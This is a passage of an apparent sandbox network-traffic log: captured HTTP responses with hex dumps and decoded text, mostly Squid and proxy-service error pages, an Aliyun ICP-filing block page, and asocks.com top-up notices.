6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:29 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=9b1e374f-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:40 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
